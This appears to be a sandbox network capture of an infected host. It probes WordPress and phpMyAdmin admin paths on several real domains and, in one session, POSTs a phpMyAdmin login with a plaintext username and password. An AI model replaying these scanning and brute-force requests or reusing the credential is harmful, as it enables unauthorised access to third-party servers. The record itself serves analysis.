2024-02-20 23:26:13 UTC	879	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 315 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-13b" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_jdNavxGRUB95ogas9JeqbFyx7mbRgO3ly1HpzXmzt5P2RQXbrHNDOOQyyUmVpi1pMGdg8mwim2Ew7boj4TYAQA Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=forwarder;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:13 UTC	315	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 64 65 66 65 72 3d 22 64 65 66 65 72 22 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 69 6d 67 31 2e 77 73 69 6d 67 2e 63 6f 6d 2f 70 61 72 6b 69 6e 67 2d 6c 61 6e 64 65 72 2f 73 74 61 74 69 63 2f 6a 73 2f 66 6f 72 77 61 72 64 65 72 2e 39 39 36 32 64 30 30 30 2e 6a Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script defer="defer" src="https://img1.wsimg.com/parking-lander/static/js/forwarder.9962d000.j

Session ID	Source IP	Source Port	Destination IP	Destination Port
160	192.168.2.6	62615	85.13.138.112	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	211	OUT	GET /wp-admin/ HTTP/1.1 Host: popular.de Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://popular.de/wp-login.php
2024-02-20 23:26:13 UTC	306	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache Upgrade: h2,h2c Connection: Upgrade, close Last-Modified: Tue, 03 May 2022 09:55:24 GMT ETag: "4ef-5de1881ee1b00;5de1892c31bf7 Accept-Ranges: bytes Content-Length: 1263 Vary: Accept-Encoding,User-Agent Content-Type: text/html
2024-02-20 23:26:13 UTC	1263	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 69 63 6f 6e 20 68 72 65 66 3d 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 3e 3c 74 69 74 6c 65 3e 50 4f 50 55 4c 41 52 20 e2 80 93 20 53 6d 61 72 74 20 63 6f 6d 6d 75 6e 69 63 61 Data Ascii: <!DOCTYPE html><html lang=en><head><meta charset=utf-8><meta http-equiv=X-UA-Compatible content="IE=edge"><meta name=viewport content="width=device-width,initial-scale=1,shrink-to-fit=no"><link rel=icon href=/favicon.ico><title>POPULAR Smart communica

Session ID	Source IP	Source Port	Destination IP	Destination Port
161	192.168.2.6	62624	15.197.204.56	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	171	OUT	GET /PhpMyAdmin/ HTTP/1.1 Host: att.com.au Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:13 UTC	877	IN	HTTP/1.1 200 OK Server: openresty Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html Content-Length: 524 Last-Modified: Mon, 29 Jan 2024 23:29:16 GMT Connection: close ETag: "65b834cc-20c" X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJRmzcpTevQqkWn6dJuX/N/Hxl7YxbOwy8+73ijqYSQEN+WGxrruAKtZtliWC86+ewQ0msW1W8psOFL/b00zWqsCAwEAAQ_UU1zcavmWED9Z/I+I63osz8cn9QtntjGc4hYzP+3TG94XxW2s/fpNEL4QoOQDauEV2ujFpIBt4sr6YQlNL5Uyg Cache-Control: no-cache X-Content-Type-Options: nosniff Set-Cookie: caf_ipaddr=191.96.227.222;Path=/;Max-Age=86400; Set-Cookie: country=US;Path=/;Max-Age=86400; Set-Cookie: city="Phoenix";Path=/;Max-Age=86400; Set-Cookie: lander_type=parking;Path=/;Max-Age=86400; Set-Cookie: expiry_partner=;Path=/;Max-Age=86400; Set-Cookie: _policy={"restricted_market":false,"tracking_market":"none"};Path=/;Max-Age=86400; Accept-Ranges: bytes
2024-02-20 23:26:13 UTC	524	IN	Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 2f 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 2c 22 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 61 64 73 65 6e 73 65 2f 64 6f 6d 61 69 6e 73 2f 63 61 66 2e 6a 73 3f 61 62 70 3d 31 22 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 4c 41 4e 44 45 Data Ascii: <!doctype html><html lang="en"><head><meta charset="UTF-8"/><meta name="viewport" content="width=device-width,initial-scale=1"/><link rel="icon" href="data:,"/><script src="https://www.google.com/adsense/domains/caf.js?abp=1"></script><script>window.LANDE

Session ID	Source IP	Source Port	Destination IP	Destination Port
162	192.168.2.6	62351	13.232.255.130	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	180	OUT	GET /phpMyAdmin/ HTTP/1.1 Host: amsantechnology.com Accept: / Accept-Encoding: deflate, gzip User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
2024-02-20 23:26:14 UTC	1406	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:13 GMT Server: Apache X-ob_mode: 1 X-Frame-Options: DENY Referrer-Policy: no-referrer Content-Security-Policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; X-Content-Security-Policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; X-WebKit-CSP: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; X-XSS-Protection: 1; mode=block X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow Expires: Tue, 20 Feb 2024 23:26:14 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 Pragma: no-cache Vary: Accept-Encoding Set-Cookie: pma_lang_https=en; expires=Thu, 21-Mar-2024 23:26:14 GMT; Max-Age=2592000; path=/phpMyAdmin/; secure; HttpOnly; SameSite=Strict Set-Cookie: phpMyAdmin_https=g2a30bp049ecbdl879i2cnu3gr; path=/phpMyAdmin/; secure; HttpOnly; SameSite=Strict Last-Modified: Tue, 20 Feb 2024 23:26:14 GMT Connection: close Transfer-Encoding: chunked Content-Type: text/html; charset=utf-8
2024-02-20 23:26:14 UTC	6786	IN	Data Raw: 32 30 30 30 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 2000<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:14 UTC	1412	IN	Data Raw: 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 69 6e 75 74 65 54 65 78 74 20 3d 20 27 4d 69 6e 75 74 65 27 3b 0a 20 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 73 65 63 6f 6e 64 54 65 78 74 20 3d 20 27 53 65 63 6f 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 Data Ascii: egional[''].minuteText = 'Minute'; $.timepicker.regional[''].secondText = 'Second'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020fi
2024-02-20 23:26:14 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:14 UTC	8192	IN	Data Raw: 32 30 30 30 0d 0a 31 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 61 78 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 6c 65 73 73 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 61 6c 5c 75 30 30 32 30 74 6f 5c 75 30 30 32 30 5c 75 30 30 37 42 30 5c 75 30 30 37 44 27 29 2c 0a 20 20 20 20 6d 69 6e 3a 20 24 2e 76 61 6c 69 64 61 74 6f 72 2e 66 6f 72 6d 61 74 28 27 50 6c 65 61 73 65 5c 75 30 30 32 30 65 6e 74 65 72 5c 75 30 30 32 30 61 5c 75 30 30 32 30 76 61 6c 75 65 5c 75 30 30 32 30 67 72 65 61 74 65 72 5c 75 30 30 32 30 74 68 61 6e 5c 75 30 30 32 30 6f 72 5c 75 30 30 32 30 65 71 75 Data Ascii: 20001\u007D'), max: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020less\u0020than\u0020or\u0020equal\u0020to\u0020\u007B0\u007D'), min: $.validator.format('Please\u0020enter\u0020a\u0020value\u0020greater\u0020than\u0020or\u0020equ
2024-02-20 23:26:14 UTC	6	IN	Data Raw: 20 20 3c 6f 70 74 Data Ascii: <opt
2024-02-20 23:26:14 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2024-02-20 23:26:14 UTC	2047	IN	Data Raw: 37 65 38 0d 0a 69 6f 6e 20 76 61 6c 75 65 3d 22 73 76 22 3e 53 76 65 6e 73 6b 61 20 2d 20 53 77 65 64 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 74 72 22 3e 54 26 75 75 6d 6c 3b 72 6b 26 63 63 65 64 69 6c 3b 65 20 2d 20 54 75 72 6b 69 73 68 3c 2f 6f 70 74 69 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6f 70 74 69 6f 6e 20 76 61 6c 75 65 3d 22 75 6b 22 3e 26 23 31 30 35 39 3b 26 23 31 30 38 32 3b 26 23 31 30 38 38 3b 26 23 31 30 37 32 3b 26 23 31 31 31 31 3b 26 23 31 30 38 35 3b 26 23 31 30 38 39 3b 26 23 31 31 30 30 3b 26 23 31 30 38 32 3b 26 23 31 30 37 32 3b 20 2d 20 55 6b 72 61 69 6e 69 Data Ascii: 7e8ion value="sv">Svenska - Swedish</option> <option value="tr">Türkçe - Turkish</option> <option value="uk">Українська - Ukraini

Session ID	Source IP	Source Port	Destination IP	Destination Port
163	192.168.2.6	63045	104.21.54.169	443

Timestamp	Bytes transferred	Direction	Data
2024-02-20 23:26:13 UTC	398	OUT	POST /phpmyadmin/index.php?route=/ HTTP/1.1 Host: fortressrealcapital.com Accept: / Accept-Encoding: deflate, gzip Cookie: phpMyAdmin_https=4i1sggv7vn9n89n6pl5o2h8dgn; pma_lang_https=en User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0 Referer: https://fortressrealcapital.com/phpmyadmin/ Content-Length: 148 Content-Type: application/x-www-form-urlencoded
2024-02-20 23:26:13 UTC	148	OUT	Data Raw: 72 6f 75 74 65 3d 25 32 46 26 6c 61 6e 67 3d 65 6e 26 74 6f 6b 65 6e 3d 35 35 34 61 35 33 36 33 37 64 33 65 36 63 37 37 34 63 35 63 36 34 33 31 34 64 36 64 32 63 37 32 26 73 65 74 5f 73 65 73 73 69 6f 6e 3d 34 69 31 73 67 67 76 37 76 6e 39 6e 38 39 6e 36 70 6c 35 6f 32 68 38 64 67 6e 26 70 6d 61 5f 75 73 65 72 6e 61 6d 65 3d 6a 61 73 6f 6e 26 70 6d 61 5f 70 61 73 73 77 6f 72 64 3d 66 6f 72 74 72 65 73 73 25 32 31 26 73 65 72 76 65 72 3d 31 Data Ascii: route=%2F&lang=en&token=554a53637d3e6c774c5c64314d6d2c72&set_session=4i1sggv7vn9n89n6pl5o2h8dgn&pma_username=jason&pma_password=fortress%21&server=1
2024-02-20 23:26:13 UTC	1361	IN	HTTP/1.1 200 OK Date: Tue, 20 Feb 2024 23:26:13 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close x-ob_mode: 1 x-frame-options: DENY referrer-policy: no-referrer content-security-policy: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval' ;style-src 'self' 'unsafe-inline' ;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-content-security-policy: default-src 'self' ;options inline-script eval-script;referrer no-referrer;img-src 'self' data: .tile.openstreetmap.org;object-src 'none'; x-webkit-csp: default-src 'self' ;script-src 'self' 'unsafe-inline' 'unsafe-eval';referrer no-referrer;style-src 'self' 'unsafe-inline' ;img-src 'self' data: *.tile.openstreetmap.org;object-src 'none'; x-xss-protection: 1; mode=block x-content-type-options: nosniff x-permitted-cross-domain-policies: none x-robots-tag: noindex, nofollow expires: Tue, 20 Feb 2024 23:26:13 +0000 Cache-Control: no-store, no-cache, must-revalidate, pre-check=0, post-check=0, max-age=0 pragma: no-cache vary: Accept-Encoding set-cookie: phpMyAdmin_https=9ca3n7ptubor1m7c8fj6budcdk; path=/phpmyadmin/; secure; HttpOnly; SameSite=Strict set-cookie: pmaAuth-1_https=deleted; expires=Thu, 01-Jan-1970 00:00:01 GMT; Max-Age=0; path=/phpmyadmin/; secure last-modified: Tue, 20 Feb 2024 23:26:13 GMT
2024-02-20 23:26:13 UTC	449	IN	Data Raw: 43 46 2d 43 61 63 68 65 2d 53 74 61 74 75 73 3a 20 44 59 4e 41 4d 49 43 0d 0a 52 65 70 6f 72 74 2d 54 6f 3a 20 7b 22 65 6e 64 70 6f 69 6e 74 73 22 3a 5b 7b 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 61 2e 6e 65 6c 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 5c 2f 72 65 70 6f 72 74 5c 2f 76 33 3f 73 3d 45 36 6d 76 4f 72 58 36 6a 38 55 46 5a 51 4f 52 6a 38 36 72 35 6a 77 77 4a 73 66 5a 34 69 47 78 78 63 7a 52 62 51 41 25 32 46 4f 49 73 76 57 35 37 44 42 4a 32 51 6e 70 48 48 7a 44 56 31 47 71 25 32 46 78 61 6c 74 66 4f 46 64 30 57 35 78 62 62 54 39 50 56 6e 42 34 42 54 36 57 4c 4c 70 64 6d 71 4f 74 77 75 31 25 32 46 43 33 59 6e 63 50 6c 44 25 32 42 4e 76 30 50 59 47 54 50 6e 50 68 4f 6d 6d 62 68 75 51 76 34 30 45 41 66 77 67 68 6b 73 72 51 47 67 25 Data Ascii: CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=E6mvOrX6j8UFZQORj86r5jwwJsfZ4iGxxczRbQA%2FOIsvW57DBJ2QnpHHzDV1Gq%2FxaltfOFd0W5xbbT9PVnB4BT6WLLpdmqOtwu1%2FC3YncPlD%2BNv0PYGTPnPhOmmbhuQv40EAfwghksrQGg%
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 34 39 32 64 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 22 6c 74 72 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 65 66 65 72 72 65 72 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 2d 72 65 66 65 72 72 65 72 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 2c 6e 6f 74 72 61 6e 73 6c Data Ascii: 492d<!doctype html><html lang="en" dir="ltr"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="referrer" content="no-referrer"> <meta name="robots" content="noindex,nofollow,notransl
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 61 6a 61 78 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6b 65 79 68 61 6e 64 6c 65 72 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 6a 71 75 65 72 79 2f 6a 71 75 65 72 79 2d 75 69 2e 6d 69 6e 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 Data Ascii: src="js/dist/ajax.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/keyhandler.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/jquery/jquery-ui.min.js?v=5.2.1"></script>
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 64 6f 63 6c 69 6e 6b 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 66 75 6e 63 74 69 6f 6e 73 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 6e Data Ascii: data-cfasync="false" type="text/javascript" src="js/dist/doclinks.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/functions.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/n
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 63 6f 64 65 6d 69 72 72 6f 72 2f 61 64 64 6f 6e 2f 6c 69 6e 74 2f 73 71 6c 2d 6c 69 6e 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 76 65 6e 64 6f 72 2f 74 72 61 63 65 6b 69 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 3c 73 63 72 69 70 74 20 64 61 74 61 2d 63 66 61 73 79 6e 63 3d 22 66 61 6c 73 65 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 6a 73 2f 64 69 73 74 2f 65 72 72 6f 72 5f 72 65 70 6f 72 74 2e 6a 73 3f 76 3d 35 2e 32 2e 31 22 3e 3c 2f 73 63 72 69 70 74 3e 0a Data Ascii: codemirror/addon/lint/sql-lint.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/vendor/tracekit.js?v=5.2.1"></script> <script data-cfasync="false" type="text/javascript" src="js/dist/error_report.js?v=5.2.1"></script>
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 70 72 65 76 54 65 78 74 20 3d 20 27 50 72 65 76 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6e 65 78 74 54 65 78 74 20 3d 20 27 4e 65 78 74 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 63 75 72 72 65 6e 74 54 65 78 74 20 3d 20 27 54 6f 64 61 79 27 3b 0a 20 20 24 2e 64 61 74 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 2e 6d 6f 6e 74 68 4e 61 6d 65 73 20 3d 20 5b 0a 20 20 20 20 27 4a 61 6e 75 61 72 79 27 2c 0a 20 20 20 20 27 46 65 62 72 75 61 72 79 27 2c 0a 20 20 20 20 27 4d 61 72 63 68 27 2c 0a 20 20 20 20 27 41 70 72 69 6c 27 2c 0a 20 20 20 20 27 4d 61 79 27 2c 0a 20 20 Data Ascii: .datepicker.regional[''].prevText = 'Prev'; $.datepicker.regional[''].nextText = 'Next'; $.datepicker.regional[''].currentText = 'Today'; $.datepicker.regional[''].monthNames = [ 'January', 'February', 'March', 'April', 'May',
2024-02-20 23:26:13 UTC	1369	IN	Data Raw: 6e 64 27 3b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 5f 64 65 66 61 75 6c 74 73 2c 20 24 2e 74 69 6d 65 70 69 63 6b 65 72 2e 72 65 67 69 6f 6e 61 6c 5b 27 27 5d 29 3b 0a 7d 0a 0a 66 75 6e 63 74 69 6f 6e 20 65 78 74 65 6e 64 69 6e 67 56 61 6c 69 64 61 74 6f 72 4d 65 73 73 61 67 65 73 20 28 29 20 7b 0a 20 20 24 2e 65 78 74 65 6e 64 28 24 2e 76 61 6c 69 64 61 74 6f 72 2e 6d 65 73 73 61 67 65 73 2c 20 7b 0a 20 20 20 20 72 65 71 75 69 72 65 64 3a 20 27 54 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 5c 75 30 30 32 30 69 73 5c 75 30 30 32 30 72 65 71 75 69 72 65 64 27 2c 0a 20 20 20 20 72 65 6d 6f 74 65 3a 20 27 50 6c 65 61 73 65 5c 75 30 30 32 30 66 69 78 5c 75 30 30 32 30 74 68 69 73 5c 75 30 30 32 30 66 69 65 6c 64 27 2c 0a 20 Data Ascii: nd'; $.extend($.timepicker._defaults, $.timepicker.regional['']);}function extendingValidatorMessages () { $.extend($.validator.messages, { required: 'This\u0020field\u0020is\u0020required', remote: 'Please\u0020fix\u0020this\u0020field',
